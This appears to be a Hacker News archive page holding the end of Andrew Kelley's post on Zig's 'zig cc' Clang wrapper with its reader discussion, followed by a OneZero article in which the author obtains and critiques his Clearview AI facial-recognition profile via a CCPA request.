   llvm::InitLLVM X(argc_, argv_);
-  SmallVector<const char *, 256> argv(argv_, argv_ + argc_);
+  size_t argv_offset = (strcmp(argv_[1], "-cc1") == 0 || strcmp(argv_[1], "-cc1as") == 0) ? 0 : 1;
+  SmallVector<const char *, 256> argv(argv_ + argv_offset, argv_ + argc_);
 
   if (llvm::sys::Process::FixupStandardFileDescriptors())
     return 1;

This disables some cruft and renames main to ZigClang_main so that it can be called like any other function. Then, in Zig's actual main, Zig checks whether its first parameter is clang and, if so, calls ZigClang_main.

So, zig clang is a low-level, undocumented API that Zig exposes for directly invoking Clang; when Zig needs to compile C code, it invokes itself as a child process by way of zig clang. zig cc, on the other hand, is much higher level and has a more difficult job: it must parse Clang's command line options and map them to the Zig compiler's settings, so that ultimately zig clang can be invoked as a child process.

Parsing Clang Command Line Options

When using zig cc, Zig acts as a proxy between the user and Clang. It does not need to understand all the parameters, but it does need to understand some of them, such as the target. This means that Zig must understand when a C command line parameter "consumes" the next parameter on the command line.

For example, -z -target would mean to pass -target to the linker, whereas -E -target would mean that the next parameter specifies the target.
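
To make the distinction concrete, here is a minimal sketch in C of that consume-the-next-parameter rule (an illustration, not Zig's implementation; the flag table is a tiny hypothetical subset):

#include <stdio.h>
#include <string.h>

/* Hypothetical subset of flags whose value is the next argv entry. */
static const char *consumes_next[] = {"-z", "-target", "-o", NULL};

static int flag_consumes_next(const char *arg) {
    for (int i = 0; consumes_next[i] != NULL; i++)
        if (strcmp(arg, consumes_next[i]) == 0)
            return 1;
    return 0;
}

int main(int argc, char **argv) {
    for (int i = 1; i < argc; i++) {
        if (flag_consumes_next(argv[i]) && i + 1 < argc) {
            /* e.g. "-z -target": here -target is the value of -z, not a flag */
            printf("flag %s consumes value %s\n", argv[i], argv[i + 1]);
            i++; /* skip the consumed value */
        } else {
            printf("standalone flag %s\n", argv[i]);
        }
    }
    return 0;
}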

Clang has a long list of command line options and so it would be foolish to try to hard-code all of them.

Fortunately, LLVM has a file, options.td, which describes all of its command line options in its TableGen format. And fortunately again, LLVM comes with the llvm-tblgen tool, which can dump that file as JSON.
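
The dump step looks roughly like this (a hypothetical invocation; the -I path is needed because Options.td pulls in shared TableGen definitions):

~/tmp> llvm-tblgen --dump-json -I llvm-project/llvm/include llvm-project/clang/include/clang/Driver/Options.td > options.json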

Zig has an update_clang_options tool which processes this JSON dump and produces a big sorted list of Clang's command line options.

Combined with a list of "known options" which correspond to Zig compiler options, this is used to make an iterator API that zig cc uses to parse command line parameters and instantiate a Zig compiler instance. Any Clang options that Zig is not aware of are forwarded to Clang directly. Some parameters are handled specially.

Linking

This part is pretty straightforward. Zig depends on LLD for linking, rather than shelling out to the system linker the way GCC and Clang do.

When you use -o with zig cc, Clang is not actually acting as the linker driver; Zig is still the linker driver.

Everybody Wins

Now that I've spent this entire blog article comparing Zig and Clang as if they were competitors, let me make it absolutely clear that these are harmonious, mutually beneficial open-source projects. It's pretty obvious how Clang and the entire LLVM project are massively beneficial to the Zig project, since Zig builds on top of them.

But it works the other way, too.

With Zig's focus on cross-compiling, its test suite has been expanding rapidly to cover a large number of architectures and operating systems, which has led to dozens of bugs reported upstream and patches sent.

Everybody wins.

This is still experimental!

I landed zig cc support only last week, and it is still experimental. Please do not expect it to be production quality yet.

Zig's 0.6.0 release is right around the corner, scheduled for April 13th. I will be sure to provide an update in the release notes on how stable and robust you can expect zig cc to be in the 0.6.0 release.

There are still some open follow-up issues related to zig cc.

As always, contributions are most welcome.

💖 Sponsor Zig 💖

Sponsor Andrew Kelley on GitHub

If you're reading this and you already sponsor me, thank you so much! I wake up every day absolutely thrilled that I get to do this for my full time job.

As Zig has been gaining popularity, demands for my time have been growing faster than funds to hire another full-time programmer. Every recurring donation helps, and if the funds keep growing then soon enough the Zig project will have two full-time programmers.

That's all folks. I hope you and your loved ones are well.




All Comments: [-] | anchor

ojosilva(3579) 3 days ago [-]

I really love Zig - it can apparently replace our C toolchain with brilliant, static cross-compilation, including s390 Linux support (mainframe Linux!).

My only gripe is that the syntax and stdlib, although practical and to the point, seem to suffer from some strange choices that somewhat clash with its own, albeit early, 'zen' of simplicity.

- '@' prefix for builtin functions, a little strange and macro-looking for my eyes. Why not just plain keywords? And cleanup some of it: `@cos`, `@sin`, also feel like too much when they are already in the stdlib I believe.

- |x| for/while list bind var, why not just for(x in y)? Surrounding pipes are really annoying to type in some foreign keyboards and feel totally needless in 99% of the places.

- inconsistent required parenthesis predicates in block statements in 'test STR {}' vs. 'if() {}'. Either require parenthesis or don't, I don't really care which one.

- prefixed type signatures, `?[]u32` feels a little off / harder to read.

- comment-looking, noisy prefixed multi-line slashes `\\`.

- the need to dig deep into 'std' to get your everyday lib functions out 'std.io.getStdOut().outStream().print()'. `@import('std')` repeated many times.

- consider implementing destructuring syntax early-on to deal with so much struct member depth ie `const { x, y } = p` or `const { math: { add, mul } } = @import('std')`.

- anonymous list syntax with `.{}` is eye catching as the dot implies 'struct member' in Zig, but then the dot is everywhere, specially when you do anonymous structs `.{.x=123}`, maybe consider `[1,2,3]` and `[x=123]` given brackets are being used for array length annotation anyways ie `array[]`.

- `.` suffix for lvalue and rvalue pointer deref. Also `'str'.` is a byte array unroll if I understood correctly. Here `f.* = Foo{ .float = 12.34 };` looks like it's doing something with `.` to get to the struct members but it's actually just a pointer deref. Also looks like a file or import lib wildcard (`file.*`) to my eyes.

- field access by string clunky `@field(p, 'x') = 123;`, with an odd function as lvalue.

Sorry for the criticism - we're seriously checking out Zig for migrating a large C codebase and replacing future C projects. Although we can live with these quirks, they just make the language look a little random and NIH and that worries me and the team. For instance, Golang has great syntax and semantic consistency which is a boost on project steering quality and assured, life-long onboarding for newbies. Please consider widening the spec peer-review process, maybe in a separate Github repo with markdown proposal writeups. Discussing syntax seems superficial given many project and compiler feats under the hood, but it can become sorta 'genetic disease' and a deal-breaker for the project in the long run!

This is a pre-release version I know, but it's just that my hopes are really up for Zig as Golang, C++ and Rust never really did it for us as a multi-target sw toochain for various reasons.

speps(2811) 3 days ago [-]

No for loops with a constant count is also a very strange choice

    for (([100]void)(undefined)) |_, verb| {
And I've been bitten multiple times with line endings having to be \n only.
jessermeyer(10000) 3 days ago [-]

Feel free to raise these as issues on Zig's issue tracker on GitHub, or comment on those which have previously been raised. If you have a good reason for something being a certain way, write up why and it may be considered as a proposal.

chronogram(10000) 4 days ago [-]

Perhaps I missed this from the blog post since it's unfamiliar to me. Can you compile Linux with this? Like, could you really straight up use this as a drop-in replacement for a whole Gentoo system?

loeg(3931) 4 days ago [-]

Historically the Linux kernel used GCC extensions that Clang did not support, and this is just a thin shim around the ordinary Clang frontend, so to the extent that's still a problem: no.

Otherwise: yeah. It's just clang's main function with a different name slapped on. Linking semantics may differ slightly which could be problematic. But in theory, yes.

AndyKelley(1111) 4 days ago [-]

I'm guessing the build system of Linux depends on more than just a C compiler, and that's why the answer to the question is 'no'. If the build system of Linux only depends on a C compiler then my answer would be:

That would be a nice stress test, which would undoubtedly lead to bugs discovered. After enough bugs fixed, the answer would be 'yes'.

I'll try it!

emmanueloga_(4280) 4 days ago [-]

The cross compiling features of Zig look fantastic! Installation is so easy, just downloading and extracting a single file.

Should every compiler stack have prioritized cross compilation over other features? (I vote: YES). Cross compiling programs has always been a PITA for most languages.

It would be great if Zig cc could be paired with vcpkg [1] for a nice cross-compiling development environment. Looks like vckpg requires a C++ compiler though.

1: https://github.com/microsoft/vcpkg

est31(3611) 4 days ago [-]

Note that on linux hosts at least, for most target platforms, being able to cross compile with clang is only one single install of the right packages away.

wyldfire(580) 4 days ago [-]

I think a problem comes when you want to distribute your compiler potentially independent from your OS and/or linker and/or C library.

But it's also fair to say that if we had always considered those things as inseparable parts of the 'compiler suite' that might have made everyone better off.

ncmncm(4233) 4 days ago [-]

Portability depends on a great deal more than just object code formats. The list of OS environment functions to call to achieve anything useful is radically different from one target to another.

This is what makes porting hard work. Cross-compiling is only the first step of a long trip.

Hello71(4168) 3 days ago [-]

Which reasonably-popular modern languages can be reasonably said to have ignored cross compilation? Interpreted languages like JavaScript and Python obviously don't have any problem, JIT languages like .NET and Java explicitly have a cross-platform layer, and modern compiled languages like Go and Rust specifically have cross-compilation as a goal. Rust still needs a libc though, but that's not Rust's fault, that's the result of trying to work together with the system instead of DIYing everything. (see: problems with Go doing system calls on BSDs, Solaris, etc)

You can't look at C, which started in the 1970s, and C++, which started in the 1980s, and expect them to have even considered cross-compilation, when Autoconf wasn't even released until 1991.

keithnz(3967) 4 days ago [-]

can zig compile to C? so many languages would be very useful if they could compile to C for embedded systems as native compilers are very unlikely for new ( or even old ) languages

vips7L(3924) 4 days ago [-]

When you compile to object files zig will generate C header files that you can use when linking. Granted, this won't help with embedded targets that zig can't compile to.

hryx(10000) 4 days ago [-]

Compiling to C source isn't planned for the reference Zig compiler, as far as I know. It's more interested in helping people move off of C (see `zig translate-c`).

But for supporting more esoteric targets you might be interested in the goals of this ultra-early-stage assembler. ('Planned targets: All of them.')

https://github.com/andrewrk/zasm

Y_Y(3875) 4 days ago [-]

What are the limitations? Speed? External libraries?

ifreund(10000) 4 days ago [-]

Afaik the only drawback is that this functionality is very new and still has some open issues (linked at the end of the post). As stated there are no dependencies for Zig and it is shipped in relatively small tarballs which can be downloaded from the Zig website: https://ziglang.org/download/

audunw(10000) 4 days ago [-]

The limitation is maturity/stability I'd say. Zig is still pre-1.0

Speed? Using Zig should be faster than using Clang directly in many cases. You get the caching system, and I think you can do more complex builds without having to resort to multiple Clang commands from a makefile.

Not sure what you mean with external libraries.

Shoop(4253) 4 days ago [-]

Really incredible work and it's been very fun to follow along. The streams where Andrew did the last part of this work can be seen here: [1], [2].

I am really happy that someone is making the effort to steadily simplify systems programming rather than make it more complicated. Linux goes to such incredible lengths to be bug-for-bug backwards compatible, but then the complexities of all of our layers of libcs, shared libraries, libsystemd, dbus, etc cause unnecessary pain and breakage at every level. Furthermore, cross-compiling C code across different architectures on Linux is far harder than it needs to be. I have a feeling that there wouldn't be as much interest in the steady stream of sandboxes and virtual machines (JVM, NaCl, PNaCl, flatpak, docker, WebAssembly) if we could just simplify the layers and layers of cruft and abstractions in compiler toolchains, libc implementations, and shared libraries. Practically every laptop and server processor uses the exact same amd64 architecture, but we have squandered this opportunity by adding leaky abstractions at so many levels. I can't wait until installing a program on linux is as simple as downloading a static executable and just running it and I hope zig brings this future.

[1] https://www.youtube.com/watch?v=2u2lEJv7Ukw [2] https://www.youtube.com/watch?v=5S2YArCx6vU

AnIdiotOnTheNet(4030) 3 days ago [-]

> I can't wait until installing a program on linux is as simple as downloading a static executable and just running it and I hope zig brings this future.

For the record: This is pretty close to what AppImage is today. It's not quite 100% because userland fragmentation is so ridiculously bad that it doesn't work out of the box on a few of them, but I personally really wish all Linux software was distributed that way (or static like Zig).

Wowfunhappy(3954) 4 days ago [-]

Linux and GCC today have the ability to compile and run fully static executables, I don't understand why this isn't done...

SaxonRobber(10000) 3 days ago [-]

How does Zig compare with Nim and Rust? (putting aside the differences in adoption)

rhodysurf(10000) 3 days ago [-]

Manual memory management is the most important difference

nrclark(10000) 4 days ago [-]

Zig looks super cool. I've been wanting to experiment with it for some system software.

Are there any guides anywhere for calling libc functions from zig? I'm interested in fork/join, chmod, fcntl, and that kind of thing. Do I just import the C headers manually? Or is there some kind of built-in libc binding?

AndyKelley(1111) 4 days ago [-]

For POSIX, you can use the standard library:

std.os.chmod

std.os.fcntl

Better yet, use the higher level cross platform abstractions. For example instead of fork/join,

std.Thread.create

std.Thread.wait

These will work in Windows as well as POSIX.

dnautics(4313) 4 days ago [-]

I think you can call libc by importing the C headers 'automagically' but zig does also give you some of these things in its (admittedly still poorly documented) std lib:

std.os.fork: https://github.com/ziglang/zig/blob/master/lib/std/os.zig#L2... std.os.fcntl: https://github.com/ziglang/zig/blob/master/lib/std/os.zig#L3...

fwsgonzo(10000) 4 days ago [-]

Looks very cool! Did not see 32-bit RISC-V on the list though, so wondering about that. I would have liked to use Zig cc to build 32-bit RISC-V binaries fast, if that is possible. Doesn't matter if they are freestanding.

AndyKelley(1111) 4 days ago [-]

You can indeed use zig to make riscv32-freestanding binaries (in both zig and C). What is not available is `-lc` for this target.

fizixer(10000) 3 days ago [-]

llvm is a bloated hot-mess of a compilation framework, built on a bloated hot-mess of a language (C++).

Folks who have achieved great things with llvm (and C++) have done so 'despite' what they used, not 'because of' it.

This has been my conviction for the past 10 years, and I'm glad I never had to touch llvm with a ten foot pole.

I had no doubts it'll soon be surpassed by a common-sense no-bullshit tool-chain.

Has Zig cc achieved that? Great. No? It will or someone (or I) will develop an alternative that will.

yellowapple(4306) 3 days ago [-]

> This has been my conviction for the past 10 years, and I'm glad I never had to touch llvm with a ten foot pole.

Out of curiosity: what do you touch with a ten foot pole? I'd be hard-pressed to call GCC or MSVC much better in that regard, and I can think of very few others that are in use anymore.

I mean, I've definitely dreamt about using SBCL or Clozure for things other than Lisp (seeing as they both include their own compilers not dependent on GCC/LLVM), but I've seen effectively zero effort in that direction.

throwaway17_17(10000) 3 days ago [-]

I'm not arguing that certain people using particular standards could consider LLVM bloated and I'm certainly not going to argue that by certain standards C++ could be considered bloated. But for users of LLVM, be it via clang or Zig cc or GHC, it seems to work just fine. Are your complaints from the perspective of a compiler dev (or a general dev who wants to be able to more easily open up and tune a compiler) or are they just as a user? Also, for native binary compilation of performance sensitive applications, how many options are there in common use for the major languages? Your opinion seems pretty severe, so I'm just trying to see why that is.

saagarjha(10000) 3 days ago [-]

> This has been my conviction for the past 10 years

I would suggest holding your convictions more loosely.

throwaway_pdp09(10000) 4 days ago [-]

I don't want to be negative as there's too much of that about but gcc and similar can do some pretty hefty optimisations, and for any real work I suspect those count for a great deal. Just because zigcc can compile C, neat as it is, doesn't make it a drop-in replacement for gcc.

Does yours do loop unrolling, code hoisting, optimise array accesses to pointer increments, common expression elimination etc?

jeltz(4168) 3 days ago [-]

This is just a new frontend for clang so it should use all the optimization passes of clang. The main new features are convenient cross compilation and better caching for partial compilation results.

lisper(119) 4 days ago [-]

Zig uses clang on the back-end, so while IANA compiler expert, I suspect it does all these things.

hobo_mark(4128) 4 days ago [-]

Yes, it's clang under the hood.

AndyKelley(1111) 4 days ago [-]

Thanks everyone for the kind words! It's been a lot of work to get this far, and the Zig project has further to go still.

If you have a few bucks per month to spare, consider chipping in. I'm hoping to have enough funds soon to hire a second full time developer.

https://github.com/users/andrewrk/sponsorship

cycloptic(10000) 4 days ago [-]

Hi Andy, thanks for your hard work on this. I am not a Zig user/sponsor yet but hopefully I will be soon. It's looking better and better every month.

rochak(4063) 3 days ago [-]

This project invites donations. It is a labor of love and solves problems that have been around a long time. Kudos!

acqq(1341) 4 days ago [-]

It is amazing work, I'm so glad you invested your attention in this direction - kudos! I haven't used the language and the compiler yet, but just reading the title article I almost jumped for joy, knowing how unexpectedly painful it is to target different versions of system libraries on Linux.

cshenton(10000) 4 days ago [-]

Thanks for all your effort on the project. By far my best experience with zig was writing an OpenGL renderer on windows which then "just worked" when I cloned it and ran `zig build` on my Linux machine. Felt like magic.

wyldfire(580) 2 days ago [-]

Hijacking your comment to ask a question: how hard is it to add support for a new architecture and/or triple (if I already have support in llvm)?

Grand bootstrapping plan [1] sounds really impressive but still WIP? Is there a commit or series of commits showing recent targets that got support?

[1] https://github.com/ziglang/zig/issues/853

jftuga(4321) 4 days ago [-]

For the 0.6.0 release, could you please provide a download for Raspberry Pi running Raspbian?

On my RPi 4, 'uname -m -o' returns: armv7l GNU/Linux

Thanks!

nikisweeting(3809) 4 days ago [-]

It's been amazing following all the progress so far. I'm a proud $5/mo sponsor and look forward to writing something in Zig soon!

Are there any concurrency constructs provided by the language yet? I'm just starting to learn how to do concurrency in lower-level languages (with mutexes and spinlocks and stuff). I'm coming from the world of Python where my experience with concurrent state is limited to simple row-level locks and `with transaction.atomic():`.

An equivalent article to this would be awesome for Zig: https://begriffs.com/posts/2020-03-23-concurrent-programming...

Edit: I just found this announcement for async function support: https://ziglang.org/download/0.5.0/release-notes.html#Async-...

BubRoss(10000) 4 days ago [-]

Why does zig purposely fail on windows text files by default? Do you really expect a language to catch on when you are purposely alienating windows users by refusing to parse \r for some bizarre reason?

eggy(3934) 3 days ago [-]

I was happily supporting Zig/you at $5/month, but things got tight. I will be back on board next month! Keep up the great work Andy!

airstrike(2227) 4 days ago [-]

> Take a moment to appreciate what just happened here - I downloaded a Windows build of Zig, ran it in Wine, using it to cross compile for Linux, and then ran the binary natively. Computers are fun!

> Compare this to downloading Clang, which has 380 MiB Linux-distribution-specific tarballs. Zig's Linux tarballs are fully statically linked, and therefore work correctly on all Linux distributions. The size difference here comes because the Clang tarball ships with more utilities than a C compiler, as well as pre-compiled static libraries for both LLVM and Clang. Zig does not ship with any pre-compiled libraries; instead it ships with source code, and builds what it needs on-the-fly.

Hot damn! You had me at Hello, World!

fao_(3511) 4 days ago [-]

You can do that in clang/gcc but you need to pass: -static and -static-plt(? I can't find what it's called). The second option is to ensure it's loader-independent, otherwise you get problems when compiling and running across musl/glibc platforms

qlk1123(4322) 4 days ago [-]

People really do appreciate such convenience. I am not familiar with Zig, but Go provides me similar experiences for cross-compilation.

Being able to bootstrap FreeBSD/amd64, Linux/arm64, and actually commonly-used OS/ARCH combinations in a few minutes is just like a dream, but it is reality for modern language users.

krate(10000) 3 days ago [-]

> Take a moment to appreciate what just happened here - I downloaded a Windows build of Zig, ran it in Wine, using it to cross compile for Linux, and then ran the binary natively. Computers are fun!

Even though it probably doesn't qualify, this is pretty close to a Canadian Cross, which for some reason is one of my favorite pieces of CS trivia. It's when you cross-compile a cross compiler.

https://en.wikipedia.org/wiki/Cross_compiler#Canadian_Cross

> The term Canadian Cross came about because at the time that these issues were under discussion, Canada had three national political parties.

crazypython(4150) 3 days ago [-]

Dlang is a better C. DMD, the reference compiler for Dlang, can also compile and link with C programs. It can even compile and link with C++03 programs.

It has manual memory management as well as garbage collection. You could call it hybrid memory management. You can manually delete GC objects, as well as allocate GC objects into manually allocated memory.

The Zig website says 'The reference implementation uses LLVM as a backend for state of the art optimizations.' However, LLVM is consistently 5% worse than the GCC toolchain at performance across multiple benchmarks. In contrast, GCC 9 and 10 officially support Dlang.

Help us update the GCC D compiler frontend to the latest DMD.

Help us merge the direct-interface-to-C++ into LLVM D Compiler main. https://github.com/Syniurge/Calypso

Help us port the standard library to WASM.

JyB(10000) 3 days ago [-]

I'm so glad we are seeing a shift towards language simplicity in all aspects (control flows, keywords, feature-set, ...). It's so important in ensuring reliable codebases in general.

woodrowbarlow(10000) 3 days ago [-]

i would love to see a shift towards small languages, which is subtly different from a shift towards simple languages.

there are plenty of things i feel are serious shortcomings of C (mixing error results with returned values is my big one), but the fact that the set of things the language can do is small and the ways you can do them are limited makes it much easier to write code that is easy to read. and that will always keep me coming back.

saagarjha(10000) 3 days ago [-]

I read through the post but I'm still a bit confused as to what parts of this are Zig and what parts are coming from other dependencies. What exactly is zig cc doing, and what does it rely on existing? Where are the savings coming from? Some people are mentioning that this is a clang frontend, so is the novelty here that zig cc 1. passes the correct options to clang and 2. ships with recompilable support libraries (written in Zig, with a C ABI) to statically link these correctly (or, in the case of glibc, it seems to have some reduced fileset that it compiles into a stub libc to link against)? Where is the clang that the options are being passed to coming from? Is this a libclang or something that Zig ships with? Does this rely on the existence of a 'dumb' cross compiler in the back at all?

thristian(2815) 3 days ago [-]

To compile C code, you need a bunch of different things: headers for the target system, a C compiler targetting that system, and a libc implementation to (statically or dynamically) link against. Different libc implementations are compatible with the C standard, but can be incompatible with each other, so it's important that you get the right one.

Cross-compiling with clang is complex because it's just a C compiler, and doesn't make assumptions about what headers the target system might use, or what libc it's using, so you have to set all those things up separately.

Zig is (apparently) a new language built on Clang/LLVM, so it can re-use that to provide a C compiler. It also makes cross-compilation easier in two other ways. First, it limits the number of supported targets - only Linux and Windows, and on Linux only glibc and musl, and all supported on a fixed list of the most common architectures. Second, building Zig involves pre-compiling every supported libc for every supported OS and architecture, and bundling them with the downloadable Zig package. That moves a lot of work from the end user to the Zig maintainers.

Like most magic tricks there's no actual magic involved, it's just somebody doing more and harder work than you can believe anyone would reasonably do.

speps(2811) 4 days ago [-]

Zig is great and I can't wait to try cc! However, Andrew if you're reading this, the std is very confusingly named. It's not a hash map, it's AutoHashMap; it's not a list, it's an ArrayList, etc. I had a lot of trouble finding idiomatic code without having to search through the std sources - an example with each struct/fn doc would help a ton.

yellowapple(4306) 3 days ago [-]

I reckon the point of the naming is to force you to think about exactly which behavior you want/need in your program, given that arrays and linked lists (for example) are very different from one another with very different performance characteristics.

It's a bit unfortunate that (last I checked) there's no 'I don't care how it's implemented as long as it's a list' option at the moment (e.g. for libraries that don't necessarily want to be opinionated about which list implementation to use). Should be possible to implement it as a common interface the same way the allocators in Zig's stdlib each implement a common interface (by generating a struct with pointers to the relevant interface functions).

tsimionescu(10000) 4 days ago [-]

To be fair, 'list' is such a generic term it's not really useful. ArrayList and LinkedList and even a hash table are all examples of lists, but their performance characteristics vary so wildly that it doesn't make sense to call any of them simply 'list'.

jedisct1(3121) 3 days ago [-]

Can `zig cc` also compile to WebAssembly/WASI?

jedisct1(3121) 3 days ago [-]

Apparently not :(

Zig is unable to provide a libc for the chosen target 'wasm32-wasi-musl'

yellowapple(4306) 3 days ago [-]

Zig itself does support cross-compiling to WASM/WASI (https://ziglang.org/documentation/master/#WebAssembly), so there's surely some way to coax 'zig cc' into doing the same (though I haven't tried it).

drfuchs(3422) 4 days ago [-]

Zig (the language) is very appealing as a 'better C than C'. Check out https://ziglang.org (dis-disclaimer: I'm unaffiliated.)

agapon(10000) 4 days ago [-]

I don't know... To me, zig does not look like C at all. IMO, go and zig are as similar to each other as they are dissimilar to C.

ifreund(10000) 4 days ago [-]

Aye, and it lives up to that claim as well in my opinion, despite being still relatively young and pre-1.0. My favorite thing about Zig is that it has managed to stay simple and solve many of the problems of C without resorting to greatly increased complexity like Rust (which is much more of a C++ replacement than a C replacement in my opinion).

pjmlp(200) 3 days ago [-]

I am still not sold on its security story, usage of @ and module imports.

ndesaulniers(1257) 4 days ago [-]

> (dis-disclaimer: I'm unaffiliated.)

https://ziglang.org/#Sponsors

> drfuchs

oh, ok

boltzmann_brain(10000) 4 days ago [-]

On a first glance, it does look like a simpler version of Rust, and I say it without demeaning Zig. Looks very promising, I'll be keeping an eye for it.

jjnoakes(10000) 4 days ago [-]

I wonder how much it would cost to sponsor compiles-via-c support. I'd love to use zig-the-language but I need to compile for platforms that LLVM does not support, so I would need to use the native C toolchain (assembler/linker at the least, but using the native C compiler seems easier).





Historical Discussions: I got my file from Clearview AI (March 25, 2020: 802 points)
I Got My File from Clearview AI, and It Freaked Me Out (March 24, 2020: 4 points)

(803) I got my file from Clearview AI

803 points 3 days ago by us0r in 1157th position

onezero.medium.com | Estimated reading time – 14 minutes | comments | anchor

I Got My File From Clearview AI, and It Freaked Me Out

Here's how you might be able to get yours

Photo: Aitor Diago/Getty Images

Have you ever had a moment of paranoia just before posting a photo of yourself (or your kid) on social media?

Maybe you felt a vague sense of unease about making the photo public. Or maybe the nebulous thought occurred to you: "What if someone used this for something?" Perhaps you just had a nagging feeling that sharing an image of yourself made you vulnerable, and opened you up to some unknowable, future threat.

It turns out that your fears were likely justified. Someone really has been monitoring nearly everything you post to the public internet. And they genuinely are doing "something" with it.

The someone is Clearview AI. And the something is this: building a detailed profile about you from the photos you post online, making it searchable using only your face, and then selling it to government agencies and police departments who use it to help track you, identify your face in a crowd, and investigate you — even if you've been accused of no crime.

I realize that this sounds like a bunch of conspiracy theory baloney. But it's not. Clearview AI's tech is very real, and it's already in use.

How do I know? Because Clearview has a profile on me. And today I got my hands on it.

Clearview AI was founded in 2017. It's the brainchild of Australian entrepreneur Hoan Ton-That and former political aide Richard Schwartz. For several years, Clearview essentially operated in the shadows. That was until an early 2020 exposé by the New York Times laid bare its activities and business model.

The Times, not usually an institution prone to hyperbole, wrote that Clearview could "end privacy as we know it." According to the exposé, the company scrapes public images from the internet. These can come from news articles, public Facebook posts, social media profiles, or multiple other sources. Clearview has apparently slurped up more than 3 billion of these images.

The company then runs its massive database of images through a facial recognition system, identifying all the people in each image based on their faces. The images are then clustered together which allows the company to form a detailed, face-linked profile of nearly anyone who has published a picture of themselves online (or has had their face featured in a news story, a company website, a mugshot, or the like).

Clearview packages this database into an easy-to-query service (originally called Smartcheckr) and sells it to government agencies, police departments, and a handful of private companies.

Clearview's clients can upload a photo of an unknown person to the system. This can be from a surveillance camera, an anonymous video posted online, or any other source. In emails received by the Times, a detective even bragged about how the system worked on photos taken of unsuspecting subjects through a telephoto lens.

In a matter of seconds, Clearview locates the person in its database using only their face. It then provides their complete profile back to the client. As of early 2020, the company had more than 2,200 customers using its service.

What does a Clearview profile contain? Up until recently, it would have been almost impossible to find out. Companies like Clearview were not required to share their data, and could easily build massive databases of personal information in secret.

Thanks to two landmark pieces of legislation, though, that is changing. In 2018, the European Union began enforcing the General Data Protection Regulation (GDPR). And on January 1, 2020, an equivalent piece of legislation, the California Consumer Privacy Act (CCPA), went into effect in my home state.

Both GDPR and CCPA give consumers unprecedented access to the personal data that companies like Clearview gather about them. If a consumer submits a valid request, companies are required to provide their data to them. The penalties for noncompliance stretch into the tens of millions of dollars. Several other U.S. states are considering similar legislation, and a federal privacy law is expected in the next five years.

Within a week of the Times' exposé, I submitted my own CCPA request to Clearview. For about a month, I got no reply. The company then asked me to fill out a web form, which I did. Another several weeks passed. I finally received a message from Clearview asking for a copy of my driver's license and a clear photo of myself.

I provided these. In minutes, they sent back my profile.

For reference, here is the photo that I provided for my search.

It's a candid cellphone photo of me making latkes. I deliberately sent a photo with a lot going on visually, and one where my face is not professionally lit or framed. I wanted to see how Clearview would perform on the kind of everyday photo that anyone might post to social media.

Here is the profile that I got back. Redactions in red are mine, as described below.

Based on the timing of emails and data from the Times' story, I estimate that Clearview retrieved my profile in under one minute. It could have been as fast as a few seconds.

The depth and variety of data that Clearview has gathered on me is staggering. My profile contains, for example, a story published about me in my alma mater's alumni magazine from 2012, and a follow-up article published a year later.

It also includes a profile page from a Python coders' meetup group that I had forgotten I belonged to, as well as a wide variety of posts from a personal blog my wife and I started just after getting married.

The profile contains the URL of my Facebook page, as well as the names of several people with connections to me, including my faculty advisor and a family member (I have redacted their information and images in red prior to publishing my profile here).

From this data, an investigator could determine quite a lot about me. First and most obviously, they would know my name. They would also know where I went to school, what line of work I'm in, and the region where I live.

From my Facebook page, they could see anything I post publicly (I was so shocked by the data available there that I made my profile private after receiving Clearview's report). And they would have data on several of my known associates — more than enough to access their Clearview profiles, too.

If someone was trying to track me down — especially someone with police powers at their disposal — Clearview's profile would give them more than enough data to do so.

Perhaps most worrying is the fact that some of Clearview's data is wrong. The last hit on my profile is a link to a Facebook page for an entirely different person. If an investigator searched my face and followed that lead (perhaps suspecting that the person was actually my alias), it's possible I could be accused of a crime that the unknown, unrelated person whose profile turned up in my report actually did commit.

Remember, all of this data was retrieved using a single image of my face. I've never been arrested or convicted of a crime. Clearview gathered my data without my knowledge, and without any justification or probable cause.

They've likely done the same for you. If they have — and you're a resident of California or a citizen of the EU — the company is legally obligated to give you your profile, too.

To access it, scan or photograph your driver's license, and choose a clear photo of yourself where your face is fully visible (not obscured by glasses, a hat, or other objects). Send these to [email protected] via email. Clearly state that your message is a CCPA or GDPR request.

Follow any instructions you receive. Expect your request to take up to two months to process. Be persistent in following up. And remember that once you receive your data, you have the option to demand that Clearview delete it or amend it if you'd like them to do so.

I know. A lot is going on right now. But as the novel coronavirus spreads worldwide, many facial recognition companies are using the pandemic as a reason to expand their services, including surveilling the public. Sometimes this leads to helpful safety measures. But we also need to be aware of — and actively manage — the privacy implications of this expansion.

Beyond the creepiness factor, Clearview's intelligence gathering raises an age-old question. If you've done nothing wrong, should you care that the company is gathering data about you? If you're a law-abiding citizen, it shouldn't matter, right?

The issue with this is that doing "something wrong" is a very slippery concept. Clearview could be used to investigate serious crimes. But it could also be used to identify every person who attended a political rally or protest, using only surveillance photos or images posted on social media.

As the Times points out, it could also be used to blackmail nearly anyone. An unscrupulous user could record people having an embarrassing conversation in public, determine their identity using their faces, and threaten to publish the conversation unless they paid up.

It could also be used to look people up indiscriminately, for no reason at all. As the Times discovered, Clearview has laid the background for accessing its system via AR glasses. This means it's conceivable that a police officer could walk through a crowd wearing AR goggles, and see the name and background information of every person in their line of sight superimposed over the person's head in real time.

We assume that we can enjoy a certain level of anonymity, even in public spaces. Clearview's technology turns that assumption on its head.

There are other major issues with Clearview's system. Its treatment of copyright, for example, should be enough to make any plaintiff's lawyer's mouth water.

Several of the photos that Clearview gathered of me — and integrated into its product — were taken by professional photographers. The picture on my Meetup profile page, for example, was taken by a photographer I hired. I own the copyright to it. And Clearview never obtained a license to use it.

On this front, the company attempts to hide behind the Digital Millennium Copyright Act. The DMCA provides a safe harbor for platforms like Facebook or Google if their users post copyrighted material. But Clearview is not a platform. And users aren't posting photos to their system — the company is actively grabbing these on its own, without copyright owners' consent. The DMCA is unlikely to apply to it.

The laws around fair use and A.I. products are complex and evolving. But if courts come down on the side of copyright owners, Clearview could potentially be sitting on 3 billion copyright infringements. Each could be worth up to $250,000 in statutory damages, provided copyright owners properly registered their rights. It's a flaw in Clearview's model that could easily bring down the company.

Even if Clearview disappears, though, another similar company would just start up in its place. Web scraping and facial recognition are essentially commodity products today. For a few million dollars, nearly anyone with a startup background could likely build their own version of Clearview in less than a year.

To truly ensure that companies like Clearview (or their clients) don't abuse citizens' privacy, society needs clear legislation dictating when facial recognition and other related technologies can and cannot be used. Already, some cities have begun to pass such legislation. But to be effective, this needs to happen at a much broader scale.

